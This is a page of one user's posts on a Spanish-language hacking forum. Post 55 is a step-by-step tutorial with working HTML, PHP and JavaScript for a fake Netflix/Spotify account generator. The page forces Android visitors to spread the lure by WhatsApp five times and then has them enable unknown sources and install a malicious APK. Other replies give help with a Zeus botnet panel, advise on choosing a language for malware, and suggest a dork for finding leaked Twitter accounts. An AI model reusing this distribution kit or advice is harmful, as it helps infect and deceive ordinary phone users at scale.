Mostrar Mensajes

Esta sección te permite ver todos los posts escritos por este usuario. Ten en cuenta que sólo puedes ver los posts escritos en zonas a las que tienes acceso en este momento.

Mensajes - rollth

Páginas: 1 2 [3] 4 5 ... 47
41
Dudas y pedidos generales / Re:¿Por donde inicio?
« en: Febrero 26, 2018, 06:52:31 am »
Yo empezaría por una de estas dos.

Talleres de Underc0de: You are not allowed to view links. Register or Login

Curso de Hacking Desde Cero: You are not allowed to view links. Register or Login

Espero que te sirva.

42
You are not allowed to view links. Register or Login
ANTRAX TU TRABAJO ES EXCELENTE PERO ME PREGUNTO SI PODRIDAS HACER UN MINI TUTORIAL DE COMO DESCARGAR E INSTALAR KALI LINUX EN VMWARE .POR QUE YO E BUSCADO BASTANTES TUTORILES Y POR ALGUNA RAZÓN SE ME LAGGUEA TODO EL PC EN LA PARTE DELA INSTALACION. :(

GRACIAS POR TU APOYO.

Eso no es porque esten mal los tutoriales, ¿que PC usas?

43
Para mi la clave es la práctica, por mucho que leas si no lo practicas te quedarás en algo borroso, y ese algo borroso desaparecerá al cabo del tiempo.

Saludos.

44
Dudas y pedidos generales / Re:Correr paso a paso un Script de Python
« en: Febrero 10, 2018, 07:45:10 pm »
Pues python tiene su propio debugger que puedes usar para ello.
You are not allowed to view links. Register or Login

Saludos.

45
Dudas y pedidos generales / Re:blind sql injection
« en: Febrero 10, 2018, 01:39:47 pm »
El parámetro no tiene que ser id, pero debe haber un parámetro para introducir el payload, ya sea por el método GET a través de la url o a través del método POST.

Saludos.

46
Dudas y pedidos generales / Re:Ayuda con BOTNET ZEUS
« en: Febrero 08, 2018, 09:38:37 am »
¿Has comprobado si tienes el módulo de MySQL activo en php?

Comprueba si tienes el módulo creando un archivo .php con lo siguiente.

Código: PHP
  1. <?php
  2.     You are not allowed to view links. Register or Login();
  3. ?>
  4.  

En caso de que no añade esto a tu php.ini y reinicia :D
extension=php_mysql.dll

Saludos.

47
Nunca me he puesto a investigar sobre el tema, podrías hacer reversing a la extensión de chrome y ver como funciona.

Saludos.

48
Dudas y pedidos generales / Re:Código hash
« en: Febrero 04, 2018, 02:19:28 pm »
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
Muy buenas,

Los hashes se encuentran en la base de datos, el código lo que haría sería conectarse a la Base de Datos y pedir el hash de el usuario en concreto y si coinciden te dejaría entrar.

Saludos.

De acuerdo, gracias! Entonces la única manera de "interceptar" el hash sería a través de sqlinject cierto?

Una SQLi sería uno de los métodos, pero no es el único, cualquier forma en la que accedas a una base de datos te serviría.

Saludos.

49
Dudas y pedidos generales / Re:Código hash
« en: Febrero 04, 2018, 12:41:21 pm »
Muy buenas,

Los hashes se encuentran en la base de datos, el código lo que haría sería conectarse a la Base de Datos y pedir el hash de el usuario en concreto y si coinciden te dejaría entrar.

Saludos.

50
Dudas y pedidos generales / Re:Duda sobre las requests de un servicio web
« en: Febrero 03, 2018, 03:49:54 pm »
You are not allowed to view links. Register or Login
Gracias por responder

Me refería a que si en este caso uso un scanner web saldria la solucitud desde el servidor web con mi ip o se usaria la ip propia de la pag web
(del server)

Lo pregunto pq no tengo claro si en este caso habría que usar proxies o tor para que no guarden la ip de los que usan los scans

No se si esta vez me he explicado bien

Gracias

Si en ese caso llegaría desde la IP de la web.
Siempre puedes hacer una prueba con otra máquina tuya y analizando el tráfico.

Saludos.

51
Dudas y pedidos generales / Re:cuentas twitter
« en: Febrero 03, 2018, 03:47:47 pm »
Que te parecería usar este dork?: twitter site:pastebin.com

Saludos.

52
Dudas y pedidos generales / Re:Duda sobre las requests de un servicio web
« en: Febrero 03, 2018, 10:18:35 am »
Buenas, con que IP saldría donde?
No tiene mucho sentido, las conexiones tienen mínimo dos puntos, es como decir que estás conversando con un persona y preguntas ¿Quien de los dos es el que conversa? Pues los dos, uno escucha y el otro habla.

Saludos.

53
Dudas y pedidos generales / Re:Pedido Web_for_pentester
« en: Febrero 02, 2018, 10:21:08 pm »
Las de la página oficial oficial funcionan perfectamente, yo mismo las usé e hice un post resolviendo la primera parte.

Saludos.

54
Hacking / Re:Propagación de Malware en Android a través de Whatsapp
« en: Febrero 01, 2018, 05:40:46 pm »
Muchas gracias a los 3 por vuestros comentarios, me alegra mucho que haya gustado :D

Saludos,

55
Hacking / Propagación de Malware en Android a través de Whatsapp
« en: Febrero 01, 2018, 03:19:44 pm »
Muy buenas Underc0ders,

hoy quería mostrar una técnica que llevo viendo mucho tiempo, en la cual se difunde algo con ingeniería social y forzándote a enviar Whatsapp para poder utilizar alguna herramienta, y así poder mostrarte publicidad. En este caso en lugar de mostrar publicidad vamos a hacer que la víctima descargue una aplicación maliciosa, para estoy yo voy a configurar un troyano con You are not allowed to view links. Register or Login.



Yo además de esto he creado una interfaz gráfica para poder engañar al usuario, simulando un generador de cuentas premium tanto en Netflix como en Spotify.



Una vez hecho esto vamos a crear una página donde indique como descargar y usar esta aplicación, al ser una infección en Android tendremos que decirle al usuario que active la opción de aceptar apk's externas a Google Play. Así ha quedado en mi caso.

estilo.css

Código: CSS
  1. body{
  2. background-color: black;
  3. }
  4.  
  5. h1{
  6. color: white;
  7. font-family: 'PT Sans';
  8. }
  9.  
  10. h2{
  11. color: red;
  12. font-family: 'PT Sans';
  13. }
  14.  
  15. h3{
  16. color: white;
  17. font-family: 'PT Sans';
  18. }
  19.  
  20. p{
  21. color: white;
  22. font-family: 'PT Sans';
  23. }
  24.  
  25.  
  26. .boton_1{
  27.     text-decoration: none;
  28.     padding: 3px;
  29.     padding-left: 10px;
  30.     padding-right: 10px;
  31.     font-family: helvetica;
  32.     font-weight: 300;
  33.     font-size: 25px;
  34.     font-style: italic;
  35.     color: #006505;
  36.     background-color: #82b085;
  37.     border-radius: 15px;
  38.     border: 3px double #006505;
  39. }
  40. .boton_1:hover{
  41.     opacity: 0.6;
  42.     text-decoration: none;
  43. }

instalacionAndroid.html

Código: HTML5
  1. <You are not allowed to view links. Register or Login>
  2. <You are not allowed to view links. Register or Login>
  3. <You are not allowed to view links. Register or Login>Instalar Generador de cuentas Spotify/Netflix para Android</You are not allowed to view links. Register or Login>
  4. <You are not allowed to view links. Register or Login REL="StyleSheet" href="estilo.css" type="text/css" MEDIA="screen">
  5. </You are not allowed to view links. Register or Login>
  6. <You are not allowed to view links. Register or Login>
  7. <You are not allowed to view links. Register or Login align="center">
  8. <You are not allowed to view links. Register or Login>GUIA DE USO GENERADOR DE CUENTAS PREMIUM</You are not allowed to view links. Register or Login>
  9. <You are not allowed to view links. Register or Login>Usar la aplicación generadora de cuentas Premium para Spotify y para Netflix es muy sencillo.</You are not allowed to view links. Register or Login></You are not allowed to view links. Register or Login><You are not allowed to view links. Register or Login>
  10. - PASO 1: Elegir en qué plataforma quiere crear la cuenta.</You are not allowed to view links. Register or Login></You are not allowed to view links. Register or Login>
  11. - PASO 2: Añadir el usuario y contraseña que quiera usar.</You are not allowed to view links. Register or Login></You are not allowed to view links. Register or Login>
  12. - PASO 3: Pulsar el botón dado para crear la cuenta.</You are not allowed to view links. Register or Login></You are not allowed to view links. Register or Login>
  13. - PASO 4: Esperar varios minutos.</You are not allowed to view links. Register or Login></You are not allowed to view links. Register or Login>
  14. - PASO 5: Entrar con dicho usuario y contraseña en la plataforma elegida.</You are not allowed to view links. Register or Login></You are not allowed to view links. Register or Login></You are not allowed to view links. Register or Login>
  15.  
  16. <You are not allowed to view links. Register or Login src="ImagenRegistro.png">
  17. <You are not allowed to view links. Register or Login>GUIA INSTALACION GENERADOR DE CUENTRAS PREMIUM</You are not allowed to view links. Register or Login>
  18. <You are not allowed to view links. Register or Login>Para instalarlo deberás aceptar aplicaciones no provenientes de Google Play en tu móvil.</You are not allowed to view links. Register or Login></You are not allowed to view links. Register or Login>
  19. <You are not allowed to view links. Register or Login>
  20. - PASO 1: Dirigete a la configuración de tu móvil.</You are not allowed to view links. Register or Login></You are not allowed to view links. Register or Login>
  21. - PASO 2: Dirigete al submenú Seguridad / Aplicaciones.</You are not allowed to view links. Register or Login></You are not allowed to view links. Register or Login>
  22. - PASO 3: Activa la opción "Fuentes desconocidas".</You are not allowed to view links. Register or Login></You are not allowed to view links. Register or Login>
  23. <You are not allowed to view links. Register or Login src="[url]http://img-17.ccm2.net/PoRKJZp-i7i9B_VAXJZ1C8gmofk=/2bd3dffc46954811a306b181e203cf9e/ccm-faq/itar-fuentes-desconocidas-android-s-.png[/url]"></You are not allowed to view links. Register or Login></You are not allowed to view links. Register or Login>
  24. - PASO 4: Descarga la aplicación de este <You are not allowed to view links. Register or Login href="programaMalicioso.apk">link</You are not allowed to view links. Register or Login> y empieza a utilizarla.
  25. </You are not allowed to view links. Register or Login>
  26. </You are not allowed to view links. Register or Login>
  27. </You are not allowed to view links. Register or Login>
  28. </You are not allowed to view links. Register or Login>





El siguiente paso sería hacer la página que nos obligará a compartir el enlace y una vez compartido nos dará permiso para ir a lo que hicimos anteriormente, y así podran descargar nuestro "generador de contraseñas premium". Les dejo el código y a continuación lo voy explicando por partes.

index.php

Código: PHP
  1. <html>
  2. <head>
  3. <title>COMPARTA LA APLICACION</title>
  4. <link REL="StyleSheet" href="estilo.css" type="text/css" MEDIA="screen">
  5. <script>
  6. <?php
  7.  
  8. include('Mobile-Detect/Mobile_Detect.php');
  9. $detect = new Mobile_Detect();
  10.  
  11. if ( $detect->isAndroidtablet() ) {
  12.    $an = 1;
  13. } elseif( $detect->isAndroid() ) {
  14.    $an = 1;
  15. } else{
  16.    $an = 0;
  17. }
  18.  
  19. echo '
  20. var an = '.$an.';
  21. '
  22. ?>
  23.  
  24. var compartido = 0;
  25. function compartir(){
  26.    compartido++;
  27.    document.getElementById("comp").innerHTML = compartido;
  28.    window.open("[url]https://api.whatsapp.com/send?text=Aplicacion%20generadora%20de%20cuentas%20Premium%20totalmente%20gratuita.%20Funcional%20en%20NETFLIX%20y%20Sporify.%20Descarga%20ahora%20en:%20192.168.1.37/index.php[/url]");
  29. }
  30. function descargar(){
  31.    if (compartido >= 5){
  32.       location.href = "instalacionAndroid.html";  
  33.    }
  34.    else{
  35.       alert("No ha compartido la herramienta suficientes veces.");  
  36.    }
  37. }
  38. </script>
  39. <script>
  40. function comprobar(){
  41.    if(an != 1){
  42.       document.getElementById("body").innerHTML = "";
  43.       alert("La aplicación es solo para Android");
  44.    }
  45. }
  46. </script>
  47. </head>
  48. <body onload="comprobar()" id="body">
  49. <div align="center">
  50. <h1>Para poder descargar la aplicación debe compartirla 5 veces por Whatsapp</h1>
  51. <h2>Veces compartida</h2> <h2 id="comp">0</h2>
  52. <button class="boton_1" onclick="compartir()">Compartir Por Whatsapp</button></br></br>
  53. <button class="boton_1" onclick="descargar()">Descargar aplicación</button></br></br>
  54. <img src="ImagenRegistro.png">
  55. </div>
  56. </body>
  57. </html>

Bien, ahora vemos por partes. Lo primero que tenemos que entender es esto:

Código: PHP
  1. include('Mobile-Detect/Mobile_Detect.php');
  2. $detect = new Mobile_Detect();
  3.  
  4. if ( $detect->isAndroidtablet() ) {
  5.    $an = 1;
  6. } elseif( $detect->isAndroid() ) {
  7.    $an = 1;
  8. } else{
  9.    $an = 0;
  10. }
  11.  
  12.  

Lo que hace esto es comprobar si estamos utilizando Android u otro sistema operativo, y de ahí crea una variable que pasa a JavaScript, que luego utilizaremos para que la página se comporte de una forma u otra dependiendo de donde se esté corriendo.

Para ello he incluído una librería que podéis encontrar You are not allowed to view links. Register or Login.

Código: Javascript
  1. function comprobar(){
  2.    if(an != 1){
  3.       document.getElementById("body").innerHTML = "";
  4.       alert("La aplicación es solo para Android");
  5.    }
  6. }

Esta parte comprueba que la página se está visualizando desde un Android, en caso contrario manda una alerta y no muestra nada.



Código: Javascript
  1. var compartido = 0;
  2. function compartir(){
  3.    compartido++;
  4.    document.getElementById("comp").innerHTML = compartido;
  5.    window.open("[url]https://api.whatsapp.com/send?text=Aplicacion%20generadora%20de%20cuentas%20Premium%20totalmente%20gratuita.%20Funcional%20en%20NETFLIX%20y%20Sporify.%20Descarga%20ahora%20en:%20192.168.1.37/index.php[/url]");
  6. }
  7. function descargar(){
  8.    if (compartido >= 5){
  9.       location.href = "instalacionAndroid.html";  
  10.    }
  11.    else{
  12.       alert("No ha compartido la herramienta suficientes veces.");  
  13.    }
  14. }

Esta parte crea dos funciones, la primera es la que te hace compartir el mensaje por whatsapp, además tiene un contador que se va actualizando cada vez que compartes.

La segunda sirve para descargar, comprueba si lo has compartido las suficientes veces y en caso positivo te redirecciona al lugar donde puedes descargar la aplicación.

Para compartir la aplicación por Whatsapp se usa el siguiente link, donde texto es el texto del mensaje que deberán enviar.

You are not allowed to view links. Register or Login

Una vez hecho esto veamos como quedaría.



Vemos que al darle al compartir nos manda a Whatsapp para enviar el mensaje de la siguiente forma.







Al compartir y volver veremos que el contador ha aumentado, entonces al llegar a 5 podremos descargar nuestra aplicación, en caso de pulsar el otro botón antes de haber compartido 5 veces nos saldrá una alerta y no nos dejará.



Ya estaría todo hecho, sé que esto se podría hacer mucho mejor, pero así es la idea básica de como funcionaría, si alguien quiere aportar código bienvenido es.

También me pueden seguir en Twitter si les hace ilusión: You are not allowed to view links. Register or Login

Saludos.

56
Hacking / Re:Recopilación Charlas Hacking
« en: Enero 29, 2018, 02:49:26 pm »
Bueno, bueno...
Ahí hay una charla que hizo el servidor :D

Saludos.

57
git clone es algo que Windows no trae de serie, basicamente lo que hace es copiarte repositorios de github.
La mayoría de distribuciones de Linux si lo traen de serie.

Prueba a ir al enlace del comando "git clone" y descargalo y descomprime directamente de la web.

Saludos.

58
Dudas y pedidos generales / Re:[Duda] Por donde empezar
« en: Enero 21, 2018, 11:33:18 am »
Vamos a ver como enforcar el tema.

Lo primero que tenemos que saber es, para donde quieres enfocar el malware, ¿Linux?,¿Windows?

Las ventajas de los lenguajes que has dicho es que son multiplataforma, por lo tanto con un solo código podrás infectar a ambos.
La desventaja es que necesitas el interprete que los corra. Esto hace que o bien, tengas suerte y lo tenga instalado, lo que podría ser negativo ya que alguien con el interprete de python hay bastantes posibilidades de que sepa programar, o bien tu le hagas instalarlo, lo que aumentaría la ing social necesaria para colar el malware.

Si te centras en un solo lenguaje (Usualmente la gente lo hace en Windows), yo me iría por algún lenguaje compilable.

Además en Windows te aconsejaría conocer bien el uso de las WinApis que te ayudarán mucho en todo este tema.

Espero que te ayude esto como guía.

Saludos.

59
Presentaciones / Re:Hola gente
« en: Enero 20, 2018, 04:55:46 pm »
Un coordial saludo vecinal :D
Espero que estes agusto por aquí.

Saludos.

60
Dudas y pedidos generales / Re:Tipo de hash
« en: Enero 14, 2018, 06:04:14 pm »
You are not allowed to view links. Register or Login
Eso mismo. ¿Alguien sabe qué tipo de hash es?

Código: You are not allowed to view links. Register or Login
1f1767b5696e79116b11ecc7f28827
a6fa1f788eb5c21f03516ec162b022
1e3e7c05f0651868110e46ee623738
23e23065fd93fdb4d71efda8fb3210

No es "Juniper NetScreen/SSG (ScreenOS)"

Pues parece como si fuera MD5 al que se le borra una letra.
Mira lo que me dice crackstation.



El resultado real.



Saludos.

Páginas: 1 2 [3] 4 5 ... 47